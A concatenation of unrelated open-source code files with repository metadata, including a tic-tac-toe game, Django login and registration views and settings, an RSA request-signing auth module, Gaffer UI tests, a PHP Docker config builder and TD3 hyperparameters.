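#   t/g           : open/close the claw; r/f : rotate the wrist
#   v/b           : show/hide the reach sphere; C : reset the camera
#   +/-           : adjust xyzstep; numpad 4/6/8/5 : orbit the view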
if __name__ == '__main__':
app = SimpleRobotArm()
#connect_arm()
app.run()
|
[
"prajapatipawan6464@gmail.com"
] |
prajapatipawan6464@gmail.com
|
6343dde6cb5f70eef3a21763abb40fab047ef166
|
7a11b6d4063685cb08b074ac8d08ab6e1d045ff5
|
/src/07_game_cross_nulls.py
|
36a888f67783bf3859b4aee3c5fb157a8f9dc7ed
|
[] |
no_license
|
slavaider/python
|
8a9f5769bd519e0e270c5814ef46ec5c653ab7c1
|
f98896b8e9dd93fe7d2b4a495b67704ef5f08373
|
refs/heads/master
| 2023-03-02T15:12:56.218871
| 2021-02-07T16:20:08
| 2021-02-07T16:20:32
| 301,493,207
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,745
|
py
|
import random
board = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']
winning_combination = [(0, 1, 2), (3, 4, 5), (6, 7, 8),
(0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]
def print_board(board_game):
for i, cell in enumerate(board_game):
if (i + 1) % 3 == 0:
print(cell)
else:
print(cell + '|', end='')
def get_winner(state, combination):
for x, y, z in combination:
if state[x] == state[y] and state[y] == state[z] and (state[x] == 'X' or state[x] == '0'):
return state[x]
# check for a draw only after all winning combinations have been ruled out
if state.count(' ') == 0:
return "-"
return ''
def play_game(board_game):
current_sign = 'X'
flag = True
while get_winner(board_game, winning_combination) == '':
if flag:
index = int(input(f'Enter a cell number from 0 to 8 to place {current_sign}: '))
flag = False
else:
while True:
index = random.randint(0, 8)
if board_game[index] == ' ':
break
print(f"Компьютер выбирает ход = {index}")
flag = True
if board_game[index] == ' ':
board_game[index] = current_sign
else:
flag = not flag
continue
print_board(board_game)
winner_sign = get_winner(board_game, winning_combination)
if winner_sign == "-":
print("Ничья")
break
if winner_sign != '':
print("Победитель " + winner_sign)
current_sign = 'X' if current_sign == '0' else '0'
if __name__ == '__main__':
play_game(board)
|
[
"slavaider1@gmail.com"
] |
slavaider1@gmail.com
|
9c76340c94481e9138c7f722b48734528aa02859
|
7775a073201f568022bbb4ed3d04cb1639ae5e65
|
/CCFA/apps/users/views.py
|
7bdb7efbf31d3ebfb78cf41dd277ed6bf50cd756
|
[] |
no_license
|
a289237642/rest-api
|
25db777fa1ca85fee77f86b8ae92d3656ce2ef40
|
fd2c70245cb12212dcd2fd8899f789c3e41d1af2
|
refs/heads/master
| 2020-04-24T14:12:13.312539
| 2019-03-14T08:41:27
| 2019-03-14T08:41:27
| 172,012,413
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,727
|
py
|
from django.shortcuts import render, redirect, reverse
from django.views import View
from .form import UserRegisterForm, UserLoginForm
from .models import UserProfile, Banner
from django.contrib.auth import authenticate, logout, login
# Create your views here.
class UserCenterView(View):
"""用户中心"""
def get(self, request):
return render(request, 'users/member.html')
def post(self, request):
pass
class UserLogoutView(View):
"""Logout"""
def get(self, request):
logout(request)
return redirect(reverse("index"))
class UserLoginView(View):
"""Login in"""
def get(self, request):
user_login_form = UserLoginForm()
return render(request, "users/login.html", {"user_login_form": user_login_form})
def post(self, request):
user_login_form = UserLoginForm(request.POST)
if user_login_form.is_valid():
username = user_login_form.cleaned_data["username"]
password = user_login_form.cleaned_data["password"]
a = authenticate(username=username, password=password)
if a:
login(request, a)
return redirect(reverse("index"))
else:
return render(request, 'users/login.html', {'msg': 'Incorrect username or password'})
else:
return render(request, 'users/login.html', {'msg': user_login_form})
class IndexView(View):
"""HomePage"""
def get(self, request):
all_banner = Banner.objects.all()[:3]
return render(request, 'index.html', {"all_banner": all_banner})
class UserRegisterView(View):
"""register"""
def get(self, request):
user_register_form = UserRegisterForm()
return render(request, 'users/user_register.html', {'user_register_form': user_register_form})
def post(self, request):
user_register_form = UserRegisterForm(request.POST)
if user_register_form.is_valid():
username = user_register_form.cleaned_data["username"]
password = user_register_form.cleaned_data["password"]
email = user_register_form.cleaned_data["email"]
user = UserProfile.objects.filter(username=username)
if user:
return render(request, 'users/user_register.html', {'msg': 'User already exists'})
else:
a = UserProfile()
a.username = username
a.set_password(password)
a.email = email
a.save()
return redirect(reverse('users:user_login'))
else:
return render(request, 'users/user_register.html', {'user_register_form': user_register_form})
|
[
"a289237642@163.com"
] |
a289237642@163.com
|
856f695c8757308f24be27a30b4e71a3c6db1381
|
f1a426f778d74dc713561ff51e12744535d3188d
|
/210427/filter.py
|
247c5878f80f0bac5dcfedd96e6dc2c11a102430
|
[] |
no_license
|
bsu414/PythonPractice
|
1067492aa26b161ca32cd7e51b06cfe02ec502c0
|
c1c7644ae29a12980ddbcc3682858d59548e4496
|
refs/heads/main
| 2023-06-03T02:59:22.598267
| 2021-06-22T09:28:09
| 2021-06-22T09:28:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
def num(a):
return type(a) == int
a = [1, 'a', '가', 5, 9.99, -10]
print(filter(num, a))
print(list(filter(num, a)))
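# Note: in Python 3, filter() returns a lazy iterator, so the first print shows
# something like <filter object at 0x...>; list(filter(num, a)) yields [1, 5, -10].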
|
[
"S20026@gsm.hs.kr"
] |
S20026@gsm.hs.kr
|
4c2aaaca0cc571f1a02e61d450f73ac7d76a878b
|
3a891a79be468621aae43defd9a5516f9763f36e
|
/desktop/core/ext-py/navoptapi-0.1.0/altuscli/auth.py
|
8fdc3e0468251e9f5891fe857f75b62bead8e9f9
|
[
"Apache-2.0"
] |
permissive
|
oyorooms/hue
|
b53eb87f805063a90f957fd2e1733f21406269aa
|
4082346ef8d5e6a8365b05752be41186840dc868
|
refs/heads/master
| 2020-04-15T20:31:56.931218
| 2019-01-09T19:02:21
| 2019-01-09T19:05:36
| 164,998,117
| 4
| 2
|
Apache-2.0
| 2019-01-10T05:47:36
| 2019-01-10T05:47:36
| null |
UTF-8
|
Python
| false
| false
| 5,275
|
py
|
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Modifications made by Cloudera are:
# Copyright (c) 2016 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from base64 import urlsafe_b64encode
from email.utils import formatdate
import logging
from altuscli.compat import json
from altuscli.compat import OrderedDict
from altuscli.compat import urlsplit
from altuscli.exceptions import NoCredentialsError
from asn1crypto import keys, pem
import rsa
LOG = logging.getLogger('altuscli.auth')
class BaseSigner(object):
def add_auth(self, request):
raise NotImplementedError("add_auth")
class RSAv1Auth(BaseSigner):
"""
RSA signing with a SHA-256 hash returning a base64 encoded signature.
"""
AUTH_METHOD_NAME = 'rsav1'
def __init__(self, credentials):
self.credentials = credentials
def _sign_string(self, string_to_sign):
try:
# We expect the private key to be a PKCS8 PEM formatted string.
pem_bytes = self.credentials.private_key.encode('utf-8')
if pem.detect(pem_bytes):
_, _, der_bytes = pem.unarmor(pem_bytes)
# In PKCS8 the key is wrapped in a container that describes it
info = keys.PrivateKeyInfo.load(der_bytes, strict=True)
# The unwrapped key is equivalent to pkcs1 contents
key = rsa.PrivateKey.load_pkcs1(info.unwrap().dump(), 'DER')
else:
raise Exception('Not a PEM file')
except:
message = \
"Failed to import private key from: '%s'. The private key is " \
"corrupted or it is not in PKCS8 PEM format. The private key " \
"was extracted either from 'env' (environment variables), " \
"'shared-credentials-file' (a profile in the shared " \
"credential file, by default under ~/.altus/credentials), or " \
"'auth-config-file' (a file containing the credentials whose " \
"location was supplied on the command line.)" % \
self.credentials.method
LOG.debug(message, exc_info=True)
raise Exception(message)
# We sign the hash.
signature = rsa.sign(string_to_sign.encode('utf-8'), key, 'SHA-256')
return urlsafe_b64encode(signature).strip().decode('utf-8')
def _canonical_standard_headers(self, headers):
interesting_headers = ['content-type', 'x-altus-date']
hoi = []
if 'x-altus-date' in headers:
raise Exception("x-altus-date found in headers!")
headers['x-altus-date'] = self._get_date()
for ih in interesting_headers:
found = False
for key in headers:
lk = key.lower()
if headers[key] is not None and lk == ih:
hoi.append(headers[key].strip())
found = True
if not found:
hoi.append('')
return '\n'.join(hoi)
def _canonical_string(self, method, split, headers):
cs = method.upper() + '\n'
cs += self._canonical_standard_headers(headers) + '\n'
cs += split.path + '\n'
cs += RSAv1Auth.AUTH_METHOD_NAME
return cs
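# Illustrative canonical string for a GET request (values are examples only):
#   GET
#   application/json
#   Tue, 01 Jan 2019 00:00:00 GMT
#   /api/v1/resource
#   rsav1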
def _get_signature(self, method, split, headers):
string_to_sign = self._canonical_string(method, split, headers)
LOG.debug('StringToSign:\n%s', string_to_sign)
return self._sign_string(string_to_sign)
def add_auth(self, request):
if self.credentials is None:
raise NoCredentialsError
LOG.debug("Calculating signature using RSAv1Auth.")
LOG.debug('HTTP request method: %s', request.method)
split = urlsplit(request.url)
signature = self._get_signature(request.method,
split,
request.headers)
self._inject_signature(request, signature)
def _get_date(self):
return formatdate(usegmt=True)
def _inject_signature(self, request, signature):
if 'x-altus-auth' in request.headers:
raise Exception("x-altus-auth found in headers!")
request.headers['x-altus-auth'] = self._get_signature_header(signature)
def _get_signature_header(self, signature):
auth_params = OrderedDict()
auth_params['access_key_id'] = self.credentials.access_key_id
auth_params['auth_method'] = RSAv1Auth.AUTH_METHOD_NAME
encoded_auth_params = json.dumps(auth_params).encode('utf-8')
return "%s.%s" % (
urlsafe_b64encode(encoded_auth_params).strip().decode('utf-8'),
signature)
AUTH_TYPE_MAPS = {
RSAv1Auth.AUTH_METHOD_NAME: RSAv1Auth,
}
|
[
"romain@cloudera.com"
] |
romain@cloudera.com
|
942af4f2c6c3756916efbedf7a9a77be4b4dd7cf
|
be3d301bf8c502bb94149c76cc09f053c532d87a
|
/python/GafferUITest/VectorDataWidgetTest.py
|
39489b24ba5a7a9d5c4dd519a8615c545afc1bb2
|
[
"BSD-3-Clause"
] |
permissive
|
ljkart/gaffer
|
28be401d04e05a3c973ef42d29a571aba6407665
|
d2ce0eb7134a33ceee375d0a3676129a9bdcfbc6
|
refs/heads/master
| 2021-01-18T08:30:19.763744
| 2014-08-10T13:48:10
| 2014-08-10T13:48:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,500
|
py
|
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import GafferTest
import GafferUI
import GafferUITest
class VectorDataWidgetTest( GafferUITest.TestCase ) :
def testIndexing( self ) :
data = [
IECore.FloatVectorData( range( 0, 3 ) ),
IECore.Color3fVectorData( [ IECore.Color3f( x ) for x in range( 0, 3 ) ] ),
IECore.StringVectorData( [ str( x ) for x in range( 0, 3 ) ] ),
IECore.IntVectorData( range( 0, 3 ) ),
IECore.V3fVectorData( [ IECore.V3f( x ) for x in range( 0, 3 ) ] ),
]
w = GafferUI.VectorDataWidget( data )
self.assertEqual( w.columnToDataIndex( 0 ), ( 0, -1 ) )
self.assertEqual( w.columnToDataIndex( 1 ), ( 1, 0 ) )
self.assertEqual( w.columnToDataIndex( 2 ), ( 1, 1 ) )
self.assertEqual( w.columnToDataIndex( 3 ), ( 1, 2 ) )
self.assertEqual( w.columnToDataIndex( 4 ), ( 2, -1 ) )
self.assertEqual( w.columnToDataIndex( 5 ), ( 3, -1 ) )
self.assertEqual( w.columnToDataIndex( 6 ), ( 4, 0 ) )
self.assertEqual( w.columnToDataIndex( 7 ), ( 4, 1 ) )
self.assertEqual( w.columnToDataIndex( 8 ), ( 4, 2 ) )
self.assertRaises( IndexError, w.columnToDataIndex, 9 )
self.assertEqual( w.dataToColumnIndex( 0, -1 ), 0 )
self.assertEqual( w.dataToColumnIndex( 1, 0 ), 1 )
self.assertEqual( w.dataToColumnIndex( 1, 1 ), 2 )
self.assertEqual( w.dataToColumnIndex( 1, 2 ), 3 )
self.assertEqual( w.dataToColumnIndex( 2, -1 ), 4 )
self.assertEqual( w.dataToColumnIndex( 3, -1 ), 5 )
self.assertEqual( w.dataToColumnIndex( 4, 0 ), 6 )
self.assertEqual( w.dataToColumnIndex( 4, 1 ), 7 )
self.assertEqual( w.dataToColumnIndex( 4, 2 ), 8 )
self.assertRaises( IndexError, w.dataToColumnIndex, 5, 0 )
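# Compound types (Color3fVectorData, V3fVectorData) expand to three view columns,
# one per component (indices 0-2); scalar data maps to a single column whose
# component index is reported as -1.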
def testColumnEditability( self ) :
data = [
IECore.FloatVectorData( range( 0, 3 ) ),
IECore.Color3fVectorData( [ IECore.Color3f( x ) for x in range( 0, 3 ) ] ),
IECore.StringVectorData( [ str( x ) for x in range( 0, 3 ) ] ),
]
w = GafferUI.VectorDataWidget( data )
for i in range( 0, 5 ) :
self.assertEqual( w.getColumnEditable( i ), True )
self.assertRaises( IndexError, w.getColumnEditable, 5 )
self.assertRaises( IndexError, w.getColumnEditable, -1 )
w.setColumnEditable( 1, False )
self.assertEqual( w.getColumnEditable( 1 ), False )
data[0][0] += 1.0
w.setData( data )
for i in range( 0, 5 ) :
self.assertEqual( w.getColumnEditable( i ), i != 1 )
cs = GafferTest.CapturingSlot( w.dataChangedSignal() )
self.assertEqual( len( cs ), 0 )
w.setColumnEditable( 0, False )
w.setColumnEditable( 1, True )
# changing editability shouldn't emit dataChangedSignal.
self.assertEqual( len( cs ), 0 )
if __name__ == "__main__":
unittest.main()
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
f0a5bc849c344e0814893f67e1ee18349f19e174
|
144b4ecf480eca2d436960994e6ed04f1033df36
|
/lib/dockerize/php/php_config.py
|
e128033545943e8014ad99efd7801a51fb69ba3f
|
[] |
no_license
|
akerouanton/docker-generator
|
bbea57d8afc8517805df73ce3c0f71692d729fb7
|
2a99464a739d32910b150daf41725294e7f9f1f5
|
refs/heads/master
| 2021-06-09T10:21:37.097753
| 2016-11-24T11:52:11
| 2016-11-24T11:52:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,048
|
py
|
import copy
class PhpConfig:
def __init__(self, version, src_dir, packages, pecl_extensions, php_extensions, php_ini, php_fpm, extra_steps, timezone='UTC', debug=False):
self.version = version
self.src_dir = src_dir
self.packages = packages
self.pecl_extensions = pecl_extensions
self.php_extensions = php_extensions
self.php_ini = php_ini
self.php_fpm = php_fpm
self.extra_steps = extra_steps
self.timezone = timezone
self.enable_xdebug = debug
self.debug = debug
def normalize(self):
config = copy.deepcopy(self)
if 'gmp' in config.php_extensions.keys():
config.extra_steps['pre_exts'].append('ln -s /usr/include/x86_64-linux-gnu/gmp.h /usr/include/gmp.h')
config.packages = config.packages + ['git', 'zlib1g-dev']
config.php_extensions.update({'zip': '*'})
config.php_ini = config.php_ini.items() + [("date.timezone", config.timezone), ("cgi.fix_pathinfo", "0")]
config.php_ini = config.php_ini + [("extension", package+".so") for package in config.pecl_extensions.keys()]
config.php_fpm = config.php_fpm.items() + [
("catch_worker_output", "yes"),
("user", "1000"),
("group", "1000"),
("request_terminate_timeout", "300")]
return config
class PhpConfigFactory:
PHP_EXTENSIONS = ['exif', 'gd', 'gmp', 'intl', 'mbstring', 'pcntl', 'pdo_mysql', 'zip']
PECL_EXTENSIONS = ['amqp', 'memcache', 'memcached', 'sundown', 'xdebug']
PACKAGES = {
'gd': ['libgd3', 'libpng12-dev'],
'gmp': ['libgmp-dev'],
'memcached': ['libmemcached-dev'],
'amqp': ['librabbitmq-dev'],
'intl': ['libicu-dev'],
'openssl': ['libssl-dev']
}
@staticmethod
def create(php_config, debug=False):
packages = php_config['packages'] + PhpConfigFactory._get_packages(php_config['exts'])
pecl_extensions = PhpConfigFactory._get_pecl_extensions(php_config['exts'])
php_extensions = PhpConfigFactory._get_php_extensions(php_config['exts'])
return PhpConfig(
php_config['version'],
php_config['src_dir'],
packages,
pecl_extensions,
php_extensions,
php_config['php_ini'],
php_config['php_fpm'],
php_config['extra_steps'],
php_config['timezone'],
debug)
@staticmethod
def _get_packages(extensions):
return [package for extension in extensions if extension in PhpConfigFactory.PACKAGES for package in PhpConfigFactory.PACKAGES[extension]]
@staticmethod
def _get_pecl_extensions(extensions):
return {extension: version for extension, version in extensions.items() if extension in PhpConfigFactory.PECL_EXTENSIONS}
@staticmethod
def _get_php_extensions(extensions):
return {extension: version for extension, version in extensions.items() if extension in PhpConfigFactory.PHP_EXTENSIONS}
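# Illustrative usage (a sketch; the dict keys mirror those read in create() above):
#   config = PhpConfigFactory.create({
#       'version': '7.0', 'src_dir': '/usr/src/php', 'packages': [],
#       'exts': {'gd': '*', 'xdebug': '*'}, 'php_ini': {}, 'php_fpm': {},
#       'extra_steps': {'pre_exts': []}, 'timezone': 'UTC',
#   }).normalize()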
|
[
"albin.kerouanton@knplabs.com"
] |
albin.kerouanton@knplabs.com
|
680620ae50730cf3844510e22d6b4edbfd234fec
|
98e00c48dc0ec205b6524f025791a9367a657e13
|
/step14.py
|
b95e780dc6ecb6f75985c58d3de35e5e8c3e930c
|
[] |
no_license
|
mextier/PyStepikC431
|
b111d4da586f8392959850f42935f19f7e007702
|
5e2d4afca95d8f68552206defbc1b46ae6b92bbc
|
refs/heads/master
| 2021-09-17T21:55:43.970377
| 2018-07-05T18:21:13
| 2018-07-05T18:21:13
| 115,948,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 451
|
py
|
l = input().upper().split()
m = input().upper()
# l = "7C 10H".split(); m = "S"
digits = "6 7 8 9 10 J Q K A".split()
k1 = (l[0][:-1], l[0][-1:])  # (rank, suit) of the first card
k2 = (l[1][:-1], l[1][-1:])  # (rank, suit) of the second card
if m not in (k1[1], k2[1]) and k1[1] != k2[1]:
print("Error")  # different non-trump suits cannot be compared
elif k1[1] == m and k2[1] != m:
print("First")  # only the first card is a trump
elif k2[1] == m and k1[1] != m:
print("Second")  # only the second card is a trump
elif digits.index(k1[0]) == digits.index(k2[0]):
print("Error")  # equal ranks
elif digits.index(k1[0]) > digits.index(k2[0]):
print("First")
else:
print("Second")
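# Example: input "7C 10H" with trump "S" prints "Error" (different non-trump suits);
# input "7C 10C" with trump "S" prints "Second" (same suit, ten outranks seven).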
|
[
"mextier@gmail.com"
] |
mextier@gmail.com
|
f029f3daceafd4c0ef7ea0d4cdc4f9463473ca60
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/google_input_tools/third_party/closure_library/closure/bin/build/source.py
|
d4d1dbabcd464184a6917f7f40327e1210227364
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 3,347
|
py
|
#!/usr/bin/env python
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scans a source JS file for its provided and required namespaces.
Simple class to scan a JavaScript file and express its dependencies.
"""
__author__ = 'nnaze@google.com'
import re
_BASE_REGEX_STRING = '^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
_PROVIDE_REGEX = re.compile(_BASE_REGEX_STRING % 'provide')
_REQUIRES_REGEX = re.compile(_BASE_REGEX_STRING % 'require')
class Source(object):
"""Scans a JavaScript source for its provided and required namespaces."""
# Matches a "/* ... */" comment.
# Note: We can't definitively distinguish a "/*" in a string literal without a
# state machine tokenizer. We'll assume that a line starting with whitespace
# and "/*" is a comment.
_COMMENT_REGEX = re.compile(
r"""
^\s* # Start of a new line and whitespace
/\* # Opening "/*"
.*? # Non greedy match of any characters (including newlines)
\*/ # Closing "*/""",
re.MULTILINE | re.DOTALL | re.VERBOSE)
def __init__(self, source):
"""Initialize a source.
Args:
source: str, The JavaScript source.
"""
self.provides = set()
self.requires = set()
self._source = source
self._ScanSource()
def GetSource(self):
"""Get the source as a string."""
return self._source
@classmethod
def _StripComments(cls, source):
return cls._COMMENT_REGEX.sub('', source)
@classmethod
def _HasProvideGoogFlag(cls, source):
"""Determines whether the @provideGoog flag is in a comment."""
for comment_content in cls._COMMENT_REGEX.findall(source):
if '@provideGoog' in comment_content:
return True
return False
def _ScanSource(self):
"""Fill in provides and requires by scanning the source."""
stripped_source = self._StripComments(self.GetSource())
source_lines = stripped_source.splitlines()
for line in source_lines:
match = _PROVIDE_REGEX.match(line)
if match:
self.provides.add(match.group(1))
match = _REQUIRES_REGEX.match(line)
if match:
self.requires.add(match.group(1))
# Closure's base file implicitly provides 'goog'.
# This is indicated with the @provideGoog flag.
if self._HasProvideGoogFlag(self.GetSource()):
if len(self.provides) or len(self.requires):
raise Exception(
'Base file should not provide or require namespaces.')
self.provides.add('goog')
def GetFileContents(path):
"""Get a file's contents as a string.
Args:
path: str, Path to file.
Returns:
str, Contents of file.
Raises:
IOError: An error occurred opening or reading the file.
"""
fileobj = open(path)
try:
return fileobj.read()
finally:
fileobj.close()
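# Illustrative usage (path is an example only):
#   src = Source(GetFileContents('closure/goog/base.js'))
#   # base.js carries the @provideGoog flag, so src.provides == set(['goog'])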
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
22d5d632b8f6c9f033d833e4bd5800a399c40f45
|
4da58b65fd3094c3b0556c7a3108d4cd1ffea0f3
|
/policy_gradients/td3/hyperparameters.py
|
4312e4f0bb25303ea733438ca37c67e687f08363
|
[] |
no_license
|
willclarktech/policy-gradient-implementations
|
b7d6d55910cf6bc25e86368365f58c51b843df24
|
311276053322272319ffac8206f1e41960495ad7
|
refs/heads/main
| 2023-07-25T22:00:18.445628
| 2023-07-07T13:03:56
| 2023-07-07T13:03:56
| 252,439,207
| 1
| 0
| null | 2023-08-19T11:33:14
| 2020-04-02T11:42:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
from typing import Any, Dict
def default_hyperparameters() -> Dict[str, Any]:
return dict(
algorithm="td3",
env_name="LunarLanderContinuous-v2",
n_episodes=1000,
log_period=1,
hidden_features=[256, 256],
alpha=1e-3,
gamma=0.99,
tau=5e-3,
d=2,
batch_size=100,
replay_buffer_capacity=1_000_000,
noise=0.2,
noise_clip=0.5,
seed=None,
)
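# Illustrative usage:
#   params = default_hyperparameters()
#   params.update(n_episodes=500, seed=42)  # per-experiment overrides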
|
[
"willclarktech@users.noreply.github.com"
] |
willclarktech@users.noreply.github.com
|
11d6331b5da605e063eb5c1046d046c3665b5d6d
|
134ff3c0719d4c0022eb0fb7c859bdbff5ca34b2
|
/apps/jobsub/src/jobsub/server_models.py
|
a04c5e3855305228120439732a22c3f4d7862d6c
|
[
"Apache-2.0"
] |
permissive
|
civascu/hue
|
22637f13a4cfc557716557661523131b6ac16da4
|
82f2de44789ff5a981ed725175bae7944832d1e9
|
refs/heads/master
| 2020-03-31T01:50:39.449966
| 2010-07-21T01:05:50
| 2010-07-21T01:07:15
| 788,284
| 0
| 0
|
Apache-2.0
| 2019-02-04T07:03:12
| 2010-07-21T07:34:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Models used by the jobsubd server.
"""
from django.db import models
# TODO(philip): Move into separate django app?
class ServerSubmissionState(models.Model):
"""
Used by jobsubd (the daemon) to keep information
about running processes.
The webapp should not access this directly.
"""
# Temporary directory where this job is running
tmp_dir = models.CharField(max_length=128)
# pid may be useful for debugging.
pid = models.IntegerField(null=True)
# This is an enum from jobsubd.thrift:State
submission_state = models.IntegerField()
start_time = models.DateTimeField(auto_now_add=True)
end_time = models.DateTimeField(null=True)
|
[
"bcwalrus@cloudera.com"
] |
bcwalrus@cloudera.com
|
2ee61366b458d01fac93797942bd0d05c0bf5ade
|
20f270edcd9a2e317f59388d375554ae05197543
|
/settings.py
|
399909f64c1ebc7f9b3d7e2030bfd4dc053923a2
|
[] |
no_license
|
hevervie/TimeCount
|
a1b4a6052a93f029300ea23cfbddab807928991b
|
15e4a3be78fc5231568bc80eb201567c2331cc0b
|
refs/heads/master
| 2021-09-07T12:51:08.906298
| 2018-02-23T06:11:29
| 2018-02-23T06:11:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,846
|
py
|
"""
Django settings for TimeCount project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+p!^r#(u1j1k%*0i_g@-sb8p6=_5w5gb$!lj59j=f-(93#1m^!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Main',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'TimeCount.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TimeCount.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'timecountdb',
'USER': 'root',
'PASSWORD': 'root',
'HOST': '127.0.0.1',
'PORT': '3306',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
[
"zhoupan@xiaomi.com"
] |
